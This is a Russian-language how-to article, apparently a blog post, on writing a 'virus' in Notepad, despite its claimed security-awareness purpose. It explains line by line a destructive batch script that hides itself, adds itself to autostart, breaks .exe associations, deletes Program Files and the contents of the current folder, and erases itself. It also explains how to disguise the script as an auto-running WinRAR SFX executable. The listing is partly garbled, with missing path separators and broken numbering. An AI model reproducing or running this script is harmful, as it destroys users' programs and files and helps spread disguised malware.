Как написать вирусы в блокноте? Пример простого вируса

Не думайте, пожалуйста, что знания о том, как пишутся вирусы, нужны только вирусописателям! В целях компьютерной безопасности они не менее важны и простым пользователям. Даже поверхностное понимание того, как написать вирусы в блокноте, поможет защитить компьютер от многих неприятностей.

Пишем вирус в блокноте

Вот так выглядит вирус, набранный в обыкновенном блокноте, который есть в составе любой системы от Microsoft Windows. Но знайте — это сложно назвать вирусом, просто системные команды, они сохраняются в формате .bat. Для изменения расширений, нужно настроить систему:

• Открываем «Компьютер«
• Заходим верхнее в меню «Сервис«, если не видно жмем ALT
• В этом меню заходим в «Сервис» выбираем пункт «Параметры папок«
• Заходим во вкладку «Вид» и ищем пункт «Скрывать расширения для зарегистрированных типов файлов«
• Убираем галочку с этого пункта.

С первого взгляда ничего страшного — всего несколько коротких слов-команд. Но на деле, если поместить этот файл в системную папку «system32\drivers\etc» и прописать его в автозагрузку, чтобы он запускался при загрузке системы, то, после перезапуска компьютера, невозможно будет открыть какую-либо программу или выбрать другое действие на рабочем столе. Не рекомендуется повторять эти действия, если нет навыков работы с системным реестром!

Вместо telnetdrive.bat попробуйте вписать безопасные команды для запуска: Calc (калькулятора), Taskmgr (диспетчера задач) или Mspaint (программы рисования)

С чего начать

Пришло время изучить небольшую общую инструкцию по «изготовлению» таких файлов.

• Первым делом открываем блокнот;
• Заносим туда команды, т.е. создаём в нём «тело» вируса;
• Сохраняем свой труд через Файл -> Сохранить как;
• Теперь осталось изменить расширение файла .txt на .bat и, вместо сохранённого названия, вписать нужное, которое будет использоваться.

Создаём первый файл-вирус

Простой вирус написан и сохранён в файл. Теперь бы неплохо узнать, что же прописали в тело вируса, сохранённого в файле.

Начинаем разбираться по порядку с первой строки:

1. @Echo off – без этой команды всё, что написано, высвечивалось бы на экране монитора.
2. Date11.14 – указывает на дату создания.
3. If exist c:sky.bat goto abc – проверка существования на диске С файла sky.bat и если его нет
4. Copy %0 c:sky.bat – размножает себя, изменив первоначальное имя файла на sky.bat
5. Attrib +h c:sky.bat – скрывает созданный файл от посторонних глаз.
6. Echo c:sky.bat >>autoexec.bat – вирус прописывается в автозагрузку.
7. :abc – если он есть, выполнение программы перейдёт сюда.

Далее идут небольшие шалости:

8. md CRECK – создаёт нужную или ненужную папку, смотря какая цель у создателя вируса.
9. md NEW – такими папками можно заполнить весь жёсткий диск у пользователя.
10. Label E: LUZER – прописывает название логического диска Е. В данном случае LUZER.
11. assoc .exe=.mp3 – расширение .exe будет ассоциироваться, как .mp
12. del c:Program Files /q –всё, что было в папке Program Files удалится.
13. del *.* /q – из каталога, где находится вирус, удалится всё, кроме папки с самим вирусом.

Повеселились достаточно, подумаем и о законе:

4. del %0 – вирус наделает дел и удалит сам себя.

Осталось последнее, узнать, как же его прячут. Просто! Переформатируют файл из расширения .bat в .exe при помощи архиватора WinRAR. При создании архива помечают – «Создать архив SFX» и устанавливают отметку «Выполнить после распаковки». Естественно, указывают настоящее имя, под которым создан вирус.